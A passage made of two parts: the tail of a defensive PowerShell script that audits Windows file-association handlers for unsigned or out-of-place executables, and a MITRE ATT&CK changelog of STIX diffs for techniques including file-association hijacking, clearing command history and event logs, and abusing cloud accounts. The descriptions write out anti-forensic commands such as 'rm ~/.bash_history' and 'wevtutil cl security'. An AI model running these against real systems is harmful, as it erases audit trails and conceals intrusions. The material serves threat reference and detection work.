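    # "%SystemRoot%\system32\NOTEPAD.EXE" %1, expanding environment variables
    # and resolving bare names (notepad.exe) through PATH.
    param([Parameter(Mandatory)][string]$Command)
    $c = [Environment]::ExpandEnvironmentVariables($Command.Trim())
    if ($c.StartsWith('"')) {
        $end = $c.IndexOf('"', 1)
        $exe = if ($end -gt 1) { $c.Substring(1, $end - 1) } else { $c.Trim('"') }
    } else {
        $exe = ($c -split '\s+', 2)[0]
    }
    if (-not [System.IO.Path]::IsPathRooted($exe)) {
        $found = Get-Command -Name $exe -CommandType Application -ErrorAction SilentlyContinue |
                 Select-Object -First 1
        if ($found) { $exe = $found.Source }
    }
    return $exe
}

function Get-FileAssociationCommands {
    param(
        # Constructed default list of commonly targeted document and script extensions.
        [string[]]$Extension = @('.txt', '.pdf', '.docx', '.xlsx', '.html', '.js', '.vbs', '.lnk')
    )
    foreach ($ext in $Extension) {
        $extKey = "Registry::HKEY_CLASSES_ROOT\$ext"
        if (-not (Test-Path -Path $extKey)) { continue }
        # The (Default) value of HKCR\.ext names the handler ProgID, e.g. txtfile for .txt.
        $handler = (Get-ItemProperty -Path $extKey -ErrorAction SilentlyContinue).'(default)'
        if ([string]::IsNullOrWhiteSpace($handler)) { continue }
        $shellKey = "Registry::HKEY_CLASSES_ROOT\$handler\shell"
        if (-not (Test-Path -Path $shellKey)) { continue }
        # Each verb key (open, print, printto, ...) carries a command subkey whose
        # (Default) value is what runs when that action is invoked on the file.
        foreach ($verb in Get-ChildItem -Path $shellKey -ErrorAction SilentlyContinue) {
            $cmdKey = "$($verb.PSPath)\command"
            if (-not (Test-Path -Path $cmdKey)) { continue }
            $cmd = (Get-ItemProperty -Path $cmdKey -ErrorAction SilentlyContinue).'(default)'
            if ([string]::IsNullOrWhiteSpace($cmd)) { continue }
            [pscustomobject]@{
                Extension  = $ext
                Handler    = $handler
                Verb       = $verb.PSChildName
                Command    = $cmd
                Executable = Resolve-CommandExecutable -Command $cmd
            }
        }
    }
}

function Test-FileAssociationCommand {
    # Returns the reasons a handler executable deserves review; an empty list means
    # it sits under a trusted root and carries a valid Authenticode signature.
    # A trusted path is a coarse filter only: a signed system binary invoked with
    # unexpected arguments still needs a look at the Command column.
    param([Parameter(Mandatory)][string]$Executable)
    $reasons = @()
    $trustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
                    Where-Object { -not [string]::IsNullOrEmpty($_) }
    $underTrusted = $false
    foreach ($root in $trustedRoots) {
        if ($Executable.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { $underTrusted = $true }
    }
    if (-not $underTrusted) { $reasons += 'executable outside Windows/Program Files' }
    if (Test-Path -LiteralPath $Executable -PathType Leaf) {
        $sig = Get-AuthenticodeSignature -FilePath $Executable
        if ($sig.Status -ne 'Valid') { $reasons += "Authenticode status: $($sig.Status)" }
    } else {
        $reasons += 'executable not found on disk'
    }
    return ,$reasons
}

# Report: one row per extension and verb, with a Findings column that is empty
# for handlers that look legitimate.
Get-FileAssociationCommands | ForEach-Object {
    $findings = Test-FileAssociationCommand -Executable $_.Executable
    $_ | Add-Member -NotePropertyName Findings -NotePropertyValue ($findings -join '; ') -PassThru
} | Format-Table Extension, Verb, Executable, Findings -AutoSize -Wrap
```

Run it from an elevated or standard prompt on an endpoint and diff the Findings column against a known-good baseline; a non-empty Findings entry for a verb such as open on .txt or .docx is the signal this technique leaves.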
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Microsoft. (n.d.). Change which programs Windows 7 uses by default. Retrieved July 26, 2016. | |
| external_references | CAPEC-556 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-556 | |
| external_references | Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August 8, 2018. | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-01-24 13:40:47.282000+00:00 | 2022-04-20 16:55:49.219000+00:00 |
| description | Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example:
* HKEY_CLASSES_ROOT\txtfile\shell\open\command
* HKEY_CLASSES_ROOT\txtfile\shell\print\command
* HKEY_CLASSES_ROOT\txtfile\shell\printto\command
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012) |
Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.(Citation: Microsoft Change Default Programs)(Citation: Microsoft File Handlers)(Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\[handler]\shell\\[action]\command. For example:
* HKEY_CLASSES_ROOT\txtfile\shell\open\command
* HKEY_CLASSES_ROOT\txtfile\shell\print\command
* HKEY_CLASSES_ROOT\txtfile\shell\printto\command
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.(Citation: TrendMicro TROJ-FAKEAV OCT 2012) |
| external_references[1]['source_name'] | capec | Microsoft Change Default Programs |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/556.html | https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs |
| external_references[2]['source_name'] | Microsoft Change Default Programs | Microsoft File Handlers |
| external_references[2]['description'] | Microsoft. (n.d.). Change which programs Windows 7 uses by default. Retrieved July 26, 2016. | Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. Retrieved November 13, 2014. |
| external_references[2]['url'] | https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs | http://msdn.microsoft.com/en-us/library/bb166549.aspx |
| external_references[3]['source_name'] | Microsoft File Handlers | Microsoft Assoc Oct 2017 |
| external_references[3]['description'] | Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. Retrieved November 13, 2014. | Plett, C. et al.. (2017, October 15). assoc. Retrieved August 7, 2018. |
| external_references[3]['url'] | http://msdn.microsoft.com/en-us/library/bb166549.aspx | https://docs.microsoft.com/windows-server/administration/windows-commands/assoc |
| external_references[4]['source_name'] | Microsoft Assoc Oct 2017 | TrendMicro TROJ-FAKEAV OCT 2012 |
| external_references[4]['description'] | Plett, C. et al.. (2017, October 15). assoc. Retrieved August 7, 2018. | Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August 8, 2018. |
| external_references[4]['url'] | https://docs.microsoft.com/windows-server/administration/windows-commands/assoc | https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd |
| external_references[5]['source_name'] | TrendMicro TROJ-FAKEAV OCT 2012 | capec |
| external_references[5]['url'] | https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd | https://capec.mitre.org/data/definitions/556.html |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution | |
| Old Description | New Description |
|---|---|
In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) |
In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (clear logging and/or clear history).(Citation: US-CERT-TA18-106A)
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) |
New Mitigations:
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-16 18:09:48.686000+00:00 | 2022-09-01 21:58:56.496000+00:00 |
| description | In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) |
In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (clear logging and/or clear history).(Citation: US-CERT-TA18-106A)
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) |
| external_references[1]['source_name'] | Microsoft PowerShell Command History | Sophos PowerShell command audit |
| external_references[1]['description'] | Microsoft. (2020, May 13). About History. Retrieved September 4, 2020. | jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7 | https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit |
| external_references[2]['source_name'] | Sophos PowerShell command audit | Microsoft PowerShell Command History |
| external_references[2]['description'] | jak. (2020, June 27). Live Discover - PowerShell command audit. Retrieved August 21, 2020. | Microsoft. (2020, May 13). About History. Retrieved September 4, 2020. |
| external_references[2]['url'] | https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit | https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7 |
| external_references[3]['source_name'] | Sophos PowerShell Command History Forensics | US-CERT-TA18-106A |
| external_references[3]['description'] | Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020. | US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. |
| external_references[3]['url'] | https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics | https://www.us-cert.gov/ncas/alerts/TA18-106A |
| x_mitre_version | 1.1 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Sophos PowerShell Command History Forensics', 'description': 'Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020.', 'url': 'https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics'} | |
| x_mitre_contributors | Austin Clark, @c2defense | |
| x_mitre_data_sources | User Account: User Account Authentication | |
| x_mitre_data_sources | Command: Command Execution | |
| x_mitre_platforms | Network | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution | |
| Description |
|---|
Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.
The event logs can be cleared with the following utility commands:
* wevtutil cl system
* wevtutil cl application
* wevtutil cl security
These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-29 21:17:03.732000+00:00 | 2022-04-20 13:02:07.168000+00:00 |
| external_references[1]['source_name'] | Microsoft wevtutil Oct 2017 | Microsoft Clear-EventLog |
| external_references[1]['description'] | Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July 2, 2018. | Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018. |
| external_references[1]['url'] | https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil | https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog |
| external_references[3]['source_name'] | Microsoft Clear-EventLog | Microsoft wevtutil Oct 2017 |
| external_references[3]['description'] | Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018. | Plett, C. et al.. (2017, October 16). wevtutil. Retrieved July 2, 2018. |
| external_references[3]['url'] | https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog | https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Deletion | |
| Description |
|---|
| Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users) Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-16 12:47:00.192000+00:00 | 2022-04-07 13:09:30.819000+00:00 |
| external_references[2]['source_name'] | Microsoft Support O365 Add Another Admin, October 2019 | AWS Create IAM User |
| external_references[2]['description'] | Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019. | AWS. (n.d.). Creating an IAM User in Your AWS Account. Retrieved January 29, 2020. |
| external_references[2]['url'] | https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d | https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html |
| external_references[3]['source_name'] | AWS Create IAM User | GCP Create Cloud Identity Users |
| external_references[3]['description'] | AWS. (n.d.). Creating an IAM User in Your AWS Account. Retrieved January 29, 2020. | Google. (n.d.). Create Cloud Identity user accounts. Retrieved January 29, 2020. |
| external_references[3]['url'] | https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users_create.html | https://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554 |
| external_references[4]['source_name'] | GCP Create Cloud Identity Users | Microsoft Azure AD Users |
| external_references[4]['description'] | Google. (n.d.). Create Cloud Identity user accounts. Retrieved January 29, 2020. | Microsoft. (2019, November 11). Add or delete users using Azure Active Directory. Retrieved January 30, 2020. |
| external_references[4]['url'] | https://support.google.com/cloudidentity/answer/7332836?hl=en&ref_topic=7558554 | https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory |
| external_references[5]['source_name'] | Microsoft Azure AD Users | Microsoft Support O365 Add Another Admin, October 2019 |
| external_references[5]['description'] | Microsoft. (2019, November 11). Add or delete users using Azure Active Directory. Retrieved January 30, 2020. | Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019. |
| external_references[5]['url'] | https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-users-azure-active-directory | https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | SaaS | |
| Old Description | New Description |
|---|---|
| Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). 
Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. Once a cloud account is compromised, an adversary may perform [Account Manipulation](https://attack.mitre.org/techniques/T1098) - for example, by adding [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) - to maintain persistence and potentially escalate their privileges. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 17:48:05.659000+00:00 | 2022-04-19 20:23:33.894000+00:00 |
| description | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. | Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). 
Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. Once a cloud account is compromised, an adversary may perform [Account Manipulation](https://attack.mitre.org/techniques/T1098) - for example, by adding [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) - to maintain persistence and potentially escalate their privileges. |
| x_mitre_version | 1.3 | 1.4 |
| Old Description | New Description |
|---|---|
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).
Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google (Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation).
Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object. |
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).
Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation)
Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-25 12:13:37.940000+00:00 | 2022-04-19 02:44:58.838000+00:00 |
| description | Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).
Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google (Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation).
Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object. |
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).
Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation)
Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS GetBucketAcl API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object. |
| external_references[1]['source_name'] | Microsoft Msolrole | AWS Get Bucket ACL |
| external_references[1]['description'] | Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019. | Amazon Web Services. (n.d.). Retrieved May 28, 2021. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0 | https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html |
| external_references[2]['source_name'] | GitHub Raindance | Black Hills Red Teaming MS AD Azure, 2018 |
| external_references[2]['description'] | Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019. | Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019. |
| external_references[2]['url'] | https://github.com/True-Demon/raindance | https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/ |
| external_references[3]['source_name'] | Microsoft AZ CLI | Google Cloud Identity API Documentation |
